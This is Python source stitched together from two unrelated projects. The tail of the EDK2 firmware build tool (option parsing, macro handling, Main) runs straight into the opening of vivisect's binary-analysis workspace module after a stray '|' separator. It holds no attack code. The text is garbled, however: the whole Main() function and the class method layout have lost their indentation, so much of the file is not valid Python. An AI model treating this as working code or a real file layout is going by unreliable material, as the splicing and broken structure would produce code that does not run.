def CreateAsBuiltInf(self):
    """Emit As-Built INF files for all pending modules, then reset both queues.

    Hash-skipped modules are invoked with True (they were not rebuilt);
    freshly built modules use the default call.
    """
    for BuiltModule in self.BuildModules:
        BuiltModule.CreateAsBuiltInf()
    for SkippedModule in self.HashSkipModules:
        SkippedModule.CreateAsBuiltInf(True)
    self.BuildModules = []
    self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
    """Quiet the logger and abort progress display (and worker threads) after an error."""
    SavedLevel = EdkLogger.GetLevel()
    # Suppress everything below ERROR while tearing down.
    EdkLogger.SetLevel(EdkLogger.ERROR)
    Utils.Progressor.Abort()
    if self.SpawnMode == True:
        # Multi-thread build: stop the task scheduler and its workers too.
        BuildTask.Abort()
    EdkLogger.SetLevel(SavedLevel)
def DumpBuildData(self):
    """Persist the timestamp and dependency caches next to the build database."""
    CacheDir = os.path.dirname(GlobalData.gDatabasePath)
    Utils.CreateDirectory(CacheDir)
    # (file name, in-memory cache) pairs serialized via Utils.DataDump.
    for FileName, Cache in (("gFileTimeStampCache", Utils.gFileTimeStampCache),
                            ("gDependencyDatabase", Utils.gDependencyDatabase)):
        Utils.DataDump(Cache, os.path.join(CacheDir, FileName))
def RestoreBuildData(self):
    """Reload the timestamp and dependency caches from disk when they are
    still empty and a previous dump exists."""
    CacheDir = os.path.dirname(GlobalData.gDatabasePath)
    for AttrName in ("gFileTimeStampCache", "gDependencyDatabase"):
        DumpPath = os.path.join(CacheDir, AttrName)
        # Only restore when the in-memory cache was never populated.
        if getattr(Utils, AttrName) == {} and os.path.isfile(DumpPath):
            Restored = Utils.DataRestore(DumpPath)
            # A failed restore yields None; fall back to an empty cache.
            setattr(Utils, AttrName, Restored if Restored is not None else {})
def ParseDefines(DefineList=None):
    """Parse '-D Name[=Value]' style macro definitions into a dict.

    Each entry is split on the first '='. A bare name maps to "TRUE";
    an explicit value has surrounding whitespace stripped. An invalid
    macro name aborts the build via EdkLogger.error.

    DefineList - list of "Name" or "Name=Value" strings, or None
    Returns a dict of macro name -> value.
    """
    # Fix: the default was a shared mutable list ([]); None keeps the exact
    # same behavior (no entries -> empty dict) without the mutable-default pitfall.
    DefineDict = {}
    if DefineList is not None:
        for Define in DefineList:
            DefineTokenList = Define.split("=", 1)
            # Macro names must match [A-Z][A-Z0-9_]* (enforced by gMacroNamePattern).
            if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
                EdkLogger.error('build', FORMAT_INVALID,
                                "The macro name must be in the pattern [A-Z][A-Z0-9_]*",
                                ExtraData=DefineTokenList[0])
            if len(DefineTokenList) == 1:
                DefineDict[DefineTokenList[0]] = "TRUE"
            else:
                DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
    return DefineDict
# Options already seen on the command line (shared across all callbacks).
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
    """optparse callback enforcing that an option appears at most once.

    The first occurrence stores *value* on the parser's values object;
    any repeat aborts argument parsing via parser.error.
    """
    if option in gParamCheck:
        parser.error("Option %s only allows one instance in command line!" % option)
    else:
        setattr(parser.values, option.dest, value)
        gParamCheck.append(option)
def LogBuildTime(Time):
    """Format a duration in seconds as 'HH:MM:SS' (plus ', N day(s)' when
    it exceeds 24 hours); return None for a falsy duration."""
    if not Time:
        return None
    Parts = time.gmtime(Time)
    Clock = time.strftime("%H:%M:%S", Parts)
    # gmtime of a duration starts at day-of-year 1; anything above means whole days.
    ExtraDays = Parts.tm_yday - 1
    if ExtraDays > 0:
        return Clock + ", %d day(s)" % ExtraDays
    return Clock
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
#   @retval Opt   A optparse.Values object containing the parsed options
#   @retval Args  Target of build command
#
def MyOptionParser():
    """Build the optparse parser for the build tool and parse sys.argv.

    Options that must not repeat are funneled through SingleCheckCallback;
    list-valued options use action="append".
    """
    Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
    # --- what to build ---
    Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'IPF', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
        help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
    Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
        help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
    Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
        help="Build the module specified by the INF file name argument.")
    Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
                      action="append")
    Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
        help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
    Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
        help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
    # --- build parallelism ---
    Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
        help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When value is set to 0, tool automatically detect number of "\
             "processor threads, set value to 1 means disable multi-thread build, and set value to more than 1 means user specify the threads number to build.")
    # --- flash image inputs/outputs ---
    Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
        help="The name of the FDF file to use, which overrides the setting in the DSC file.")
    Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
        help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
    Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
        help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
    Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
        help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
    # --- behavior switches ---
    Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
    Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
    Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
    Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
    # --- logging / verbosity ---
    Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
    Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
        help="Make use of silent mode of (n)make.")
    Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
    Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
                                                                              "including library instances selected, final dependency expression, "\
                                                                              "and warning messages, etc.")
    Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
    Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
    # --- reporting ---
    Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
    Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD','LIBRARY','FLASH','DEPEX','BUILD_FLAGS','FIXED_ADDRESS','HASH','EXECUTION_ORDER'], dest="ReportType", default=[],
        help="Flags that control the type of build report to generate.  Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER].  "\
             "To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
    Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
        help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
             "This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
             "will override the setting in [BuildOptions] section of platform DSC.")
    # --- caching / misc ---
    Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
    Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
    Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
    Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
    Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
    Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
    Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
    Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
    Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
    Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")

    (Opt, Args) = Parser.parse_args()
    return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile is not None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
# Drop temp tables to avoid database locked.
for TmpTableName in TmpTableDict:
SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
TmpTableDict[TmpTableName].execute(SqlCommand)
#MyBuild.DumpBuildData()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError, X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning, X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to edk2-devel@lists.01.org for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
MyBuild.Db.Close()
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
    # Script entry point: run the build driver and convert its result
    # into a shell-safe process exit status.
    r = Main()
    ## 0-127 is a safe return range, and 1 is a standard default error
    if r < 0 or r > 127: r = 1
    sys.exit(r)
|
__init__.py | """
Yay! It's NOT IDA!!!1!!1!one!
"""
import os
import re
import sys
import time
import queue
import string
import hashlib
import logging
import binascii
import itertools
import traceback
import threading
import collections
import envi
import envi.exc as e_exc
import envi.bits as e_bits
import envi.common as e_common
import envi.memory as e_mem
import envi.config as e_config
import envi.bytesig as e_bytesig
import envi.symstore.resolver as e_resolv
import envi.symstore.symcache as e_symcache
import vstruct
import vstruct.cparse as vs_cparse
import vstruct.primitives as vs_prims
import vivisect.base as viv_base
import vivisect.parsers as viv_parsers
import vivisect.codegraph as viv_codegraph
import vivisect.impemu.lookup as viv_imp_lookup
from vivisect.exc import *
from vivisect.const import *
from vivisect.defconfig import *
import vivisect.analysis.generic.emucode as v_emucode
# Module-level logger for the vivisect package.
logger = logging.getLogger(__name__)
# Location types at which analysis passes stop treating bytes as undefined.
STOP_LOCS = (LOC_STRING, LOC_UNI, LOC_STRUCT, LOC_CLSID, LOC_VFTABLE, LOC_IMPORT, LOC_PAD, LOC_NUMBER)
# Short storage-format names mapped to the python modules implementing them.
STORAGE_MAP = {
    'viv': 'vivisect.storage.basicfile',
    'mpviv': 'vivisect.storage.mpfile',
}
def guid(size=16):
    '''
    Return a random identifier as a bytes object of hex characters.

    size is the number of random bytes drawn, so the returned value
    is 2*size hex characters long.
    '''
    rand = os.urandom(size)
    return binascii.hexlify(rand)
class VivWorkspace(e_mem.MemoryObject, viv_base.VivWorkspaceCore):
'''
VivWorkspace is the heart of vivisect's binary analysis. Most APIs accept a VivWorkspace
as their first parameter, and the workspace is responsible for all the user facing functions
of getters/adders, running analysis passes, making the various locations, loading files, and
more.
Current keyword arguments:
* confdir:
* Type: String (path to directory)
* Description: A path to a directory to save/load vivisect's analysis configuration options (options will be saved to/loaded from the viv.json file in the directory
* Default: $HOME/.viv/
* autosave (boolean):
* Type: Boolean
* Description: If true, autosave any configuration changes to the <confdir>/viv.json upon changing them.
* Default: False
'''
def __init__(self, **kwargs):
    """
    Construct an empty workspace and initialize all in-memory indexes.
    See the class docstring for supported keyword arguments
    (confdir, autosave).
    """
    e_mem.MemoryObject.__init__(self)
    viv_base.VivWorkspaceCore.__init__(self)
    autosave = kwargs.get('autosave', False)
    cfgdir = kwargs.get('confdir', None)
    if cfgdir:
        self.vivhome = os.path.abspath(cfgdir)
    else:
        # Default config home; only created on disk when autosave is set.
        self.vivhome = e_config.gethomedir(".viv", makedir=autosave)
    self._viv_gui = None    # If a gui is running, he will put a ref here...
    self._ext_ctxmenu_hooks = {}
    self._extensions = {}
    self.saved = False  # TODO: Have a warning when we try to close the UI if the workspace hasn't been saved
    self.rchan = None   # Event channel id when acting as a client (see initWorkspaceClient)
    self.server = None  # Remote workspace ref when acting as a client
    self.chanids = itertools.count()
    self.arch = None    # The placeholder for the Envi architecture module
    self.psize = None   # Used so much, optimization is appropriate
    cfgpath = os.path.join(self.vivhome, 'viv.json')
    self.config = e_config.EnviConfig(filename=cfgpath, defaults=defconfig, docs=docconfig, autosave=autosave)
    # Ideally, *none* of these are modified except by _handleFOO funcs...
    self.segments = []
    self.exports = []
    self.imports = []
    self.codeblocks = []
    self.relocations = []
    self._dead_data = []
    self.iscode = {}
    self.xrefs = []
    self.xrefs_by_to = {}
    self.xrefs_by_from = {}
    # XXX - make config option
    self.greedycode = 0
    self.metadata = {}
    self.comments = {}  # Comment by VA.
    self.symhints = {}
    self.filemeta = {}  # Metadata Dicts stored by filename
    self.transmeta = {}  # Metadata that is *not* saved/evented
    self.cfctx = viv_base.VivCodeFlowContext(self)
    self.va_by_name = {}
    self.name_by_va = {}
    self.codeblocks_by_funcva = {}
    self.exports_by_va = {}
    self.colormaps = {}
    self.vasetdefs = {}
    self.vasets = {}
    self.reloc_by_va = {}
    self.func_args = {}
    self.funcmeta = {}  # Function metadata stored in the workspace
    self.frefs = {}
    # Extended analysis modules
    self.amods = {}
    self.amodlist = []
    # Extended *function* analysis modules
    self.fmods = {}
    self.fmodlist = []
    self.chan_lookup = {}
    self.nextchanid = 1
    self._cached_emus = {}
    # The function entry signature decision tree
    # FIXME add to export
    self.sigtree = e_bytesig.SignatureTree()
    self.siglist = []
    self._op_cache = {}
    self._initEventHandlers()
    # Some core meta types that exist
    self.setMeta('NoReturnApis', {})
    self.setMeta('SymbolikImportEmulation', None)
    # Default to basic file storage
    self.setMeta("StorageModule", "vivisect.storage.basicfile")
    # There are a few default va sets for use in analysis
    self.addVaSet('EntryPoints', (('va', VASET_ADDRESS),))
    self.addVaSet('NoReturnCalls', (('va', VASET_ADDRESS),))
    self.addVaSet("Emulation Anomalies", (("va", VASET_ADDRESS), ("Message", VASET_STRING)))
    self.addVaSet("Bookmarks", (("va", VASET_ADDRESS), ("Bookmark Name", VASET_STRING)))
    self.addVaSet('DynamicBranches', (('va', VASET_ADDRESS), ('opcode', VASET_STRING), ('bflags', VASET_INTEGER)))
    self.addVaSet('SwitchCases', (('va', VASET_ADDRESS), ('setup_va', VASET_ADDRESS), ('Cases', VASET_INTEGER)))
    self.addVaSet('PointersFromFile', (('va', VASET_ADDRESS), ('target', VASET_ADDRESS), ('file', VASET_STRING), ('comment', VASET_STRING), ))
    self.addVaSet('CodeFragments', (('va', VASET_ADDRESS), ('calls_from', VASET_COMPLEX)))
    self.addVaSet('EmucodeFunctions', (('va', VASET_ADDRESS),))
    self.addVaSet('FuncWrappers', (('va', VASET_ADDRESS), ('wrapped_va', VASET_ADDRESS),))
def vprint(self, msg):
    '''
    Emit a user-facing status message (routed through the module logger;
    a GUI may observe these via the logging subsystem).
    '''
    logger.info(msg)
def getVivGui(self):
    '''
    Return a reference to the vivisect GUI object for this workspace. If
    the GUI is not running (aka, the workspace is being used programatically)
    this routine returns None.

    Example:
        vwgui = vw.getVivGui()
        if vwgui:
            vwgui.doStuffAndThings()
    '''
    return self._viv_gui
def addCtxMenuHook(self, name, handler):
    '''
    Extensions can add Context Menu hooks to modify the menu as they wish.
    This would most often happen from the Extension's vivExtension() init function.
    see vivisect.qt.ctxmenu for more details

    handler should have the following prototype (inc. example code):

        from vqt.common import ACT
        def myExtCtxMenuHandler(vw, menu):
            toymenu = menu.addMenu('myToys')
            toymenu.addAction('Voodoo Wizbang ZeroDay Finder Thingy', ACT(doCoolShit, vw, va))

    Currently, this should live in a loaded module, not in your Viv Extension's main py file.
    '''
    # Duplicate registrations are rejected (first hook wins) and logged.
    if name in self._ext_ctxmenu_hooks:
        cur = self._ext_ctxmenu_hooks[name]
        logger.warning("Attempting to hook the context menu: %r is already registered \
                (cur: %r new: %r)", name, cur, handler)
        return
    self._ext_ctxmenu_hooks[name] = handler
def delCtxMenuHook(self, name):
    '''
    Remove a context-menu hook that has been installed by an extension.
    Unknown names are silently ignored.
    '''
    if name in self._ext_ctxmenu_hooks:
        del self._ext_ctxmenu_hooks[name]
def addExtension(self, name, extmod):
    '''
    Add extension module to a list of extensions.

    This keeps a list of installed extension modules, with the added value
    of keeping the loaded module in memory. Duplicate registrations are
    rejected (the first module registered under a name wins).
    '''
    if name in self._extensions:
        cur = self._extensions[name]
        # Bug fix: this warning previously referenced the undefined name
        # 'handler' (copy/paste from addCtxMenuHook), so a duplicate
        # registration raised NameError instead of warning. The message
        # is also collapsed to one line, removing the stray indentation
        # the old line-continuation embedded in the log output.
        logger.warning("Attempting to register an extension: %r is already registered (cur: %r new: %r)",
                       name, cur, extmod)
        return
    self._extensions[name] = extmod
def delExtension(self, name):
    '''
    Remove an extension module from the list of extensions.
    Unknown names are silently ignored.
    '''
    if name in self._extensions:
        del self._extensions[name]
def getVivGuid(self):
    '''
    Return the GUID for this workspace. Every newly created VivWorkspace
    should have a unique GUID, for identifying a particular workspace for
    a given binary/process-space versus another created at a different
    time. Filesystem-copies of the same workspace will have the same GUID
    by design. This easily allows for workspace-specific GUI layouts as
    well as comparisons of Server-based workspaces to the original file-
    based workspace used to store to the server.
    '''
    # Lazily mint and persist a GUID on first request.
    vivguid = self.getMeta('GUID')
    if vivguid is None:
        vivguid = guid()
        self.setMeta('GUID', vivguid)
    return vivguid
def loadWorkspace(self, wsname):
    '''
    Load workspace state from the named storage location, using the
    storage backend selected by the "StorageModule" meta, then snap in
    the analysis modules.
    '''
    mname = self.getMeta("StorageModule")
    mod = self.loadModule(mname)
    mod.loadWorkspace(self, wsname)
    # Remember where we loaded from so saves go back to the same place.
    self.setMeta("StorageName", wsname)
    # The event list thusfar came *only* from the load...
    self._createSaveMark()
    # Snapin our analysis modules
    self._snapInAnalysisModules()
def addFref(self, fva, va, idx, val):
    """
    Add a reference from the operand at virtual address 'va'
    index 'idx' to a function local offset. Positive values
    (beginning with 0) are considered argument references. Negative
    values are considered function local storage and are relative to
    the stack pointer at function entry.
    """
    # FIXME this should probably be an argument
    # NOTE(review): 'fva' is accepted but unused; the event payload
    # carries only (va, idx, val).
    r = (va, idx, val)
    self._fireEvent(VWE_ADDFREF, r)
def getFref(self, va, idx):
    """
    Get back the fref value (or None) for the given operand index
    from the instruction at va.
    """
    key = (va, idx)
    return self.frefs.get(key)
def getEmulator(self, **kwargs):
    """
    Get an instance of a WorkspaceEmulator for this workspace.

    Use logread/logwrite to enable memory access tracking.

    Raises Exception when no emulator class is registered for either the
    (platform, architecture) pair or the bare architecture.
    """
    plat = self.getMeta('Platform')
    arch = self.getMeta('Architecture')
    # Prefer a platform-specific emulator, falling back to arch-only.
    eclass = viv_imp_lookup.workspace_emus.get((plat, arch))
    if eclass is None:
        eclass = viv_imp_lookup.workspace_emus.get(arch)
    if eclass is None:
        raise Exception("WorkspaceEmulation not supported on %s yet!" % arch)
    emu = eclass(self, **kwargs)
    # The emulator must match the workspace's endianness.
    emu.setEndian(self.getEndian())
    return emu
def getCachedEmu(self, emuname):
    """
    Get a cached emulator by name. If one doesn't exist it is
    created (with default options) and then cached.
    """
    cached = self._cached_emus.get(emuname)
    if cached is not None:
        return cached
    emu = self.getEmulator()
    self._cached_emus[emuname] = emu
    return emu
def addLibraryDependancy(self, libname):
    """
    Add a *normalized* library name to the import search
    chain for this binary. This is only needed for formats
    whose imports don't explicitly state their library name.
    """
    # FIXME this needs to be event enabled... either plumb it special,
    # or allow the get/append/set race...
    deps = self.getMeta("DepLibs", None)
    if deps is None:
        deps = []
    deps.append(libname)
    self.setMeta("DepLibs", deps)
def getLibraryDependancies(self):
    '''
    Retrieve a copy of the list of *normalized* library dependancies.
    '''
    deps = self.getMeta("DepLibs", None)
    return list(deps) if deps is not None else []
def setComment(self, va, comment, check=False):
    '''
    Set the humon readable comment for a given virtual.
    Comments will be displayed by the code renderer, and
    are an important part of this balanced breakfast.

    When check is True, an existing (truthy) comment at va is preserved
    and this call is a no-op.

    Example:
        vw.setComment(callva, "This actually calls FOO...")
    '''
    existing = self.comments.get(va) if check else None
    if not existing:
        self._fireEvent(VWE_COMMENT, (va, comment))
def getComment(self, va):
    '''
    Returns the comment string (or None) for a given
    virtual address.

    Example:
        cmnt = vw.getComment(va)
        print('COMMENT: %s' % cmnt)
    '''
    return self.comments.get(va)
def getComments(self):
    '''
    Retrieve all the comments in the viv workspace as
    (va, cmnt) tuples. Returns a snapshot list, safe to
    iterate while comments change.

    Example:
        for va,cmnt in vw.getComments():
            print('Comment at 0x%.8x: %s' % (va, cmnt))
    '''
    return list(self.comments.items())
def addRelocation(self, va, rtype, data=None):
    """
    Add a relocation entry for tracking.
    Expects data to have whatever is necessary for the reloc type. eg. addend

    NOTE(review): va must fall inside a known memory map; getMemoryMap
    returning None would raise TypeError on the unpack below.
    """
    # split "current" va into fname and offset. future relocations will want to base all va's from an image base
    mmva, mmsz, mmperm, fname = self.getMemoryMap(va) # FIXME: getFileByVa does not obey file defs
    imgbase = self.getFileMeta(fname, 'imagebase')
    offset = va - imgbase
    self._fireEvent(VWE_ADDRELOC, (fname, offset, rtype, data))
def getRelocations(self):
    """
    Get the current list of relocation entries.
    NOTE: returns the live internal list, not a copy.
    """
    return self.relocations
def getRelocation(self, va):
    """
    Return the type of relocation at the specified
    VA or None if there isn't a relocation entry for
    the address.
    """
    return self.reloc_by_va.get(va)
def pointerString(self, va):
    '''
    Return the architecture-specific string rendering of a pointer value.
    '''
    return self.arch.pointerString(va)
def getAnalysisModuleNames(self):
    '''
    Return a copy of the ordered list of registered analysis module names.
    '''
    return list(self.amodlist)
def getFuncAnalysisModuleNames(self):
    '''
    Return a copy of the ordered list of registered per-function
    analysis module names.
    '''
    return list(self.fmodlist)
def addFunctionSignatureBytes(self, bytez, mask=None):
    """
    Add a function signature entry by bytes. This is mostly used by
    file parsers/loaders to manually tell the workspace about known
    entry signature types.

    see envi.bytesig for details.
    """
    # Record the raw signature, and feed it to the decision tree.
    self.siglist.append((bytez, mask))
    self.sigtree.addSignature(bytez, mask)
def isFunctionSignature(self, va):
    """
    Check if the specified va is a function entry signature
    according to the current entry point signature tree...
    """
    if not self.isValidPointer(va):
        return False
    offset, bytez = self.getByteDef(va)
    return self.sigtree.isSignature(bytez, offset=offset)
def addNoReturnVa(self, va):
    '''
    Record the given va as a no-return address (in the NoReturnApisVa
    meta) and inform the codeflow context.
    '''
    noret = self.getMeta('NoReturnApisVa', {})
    noret[va] = True
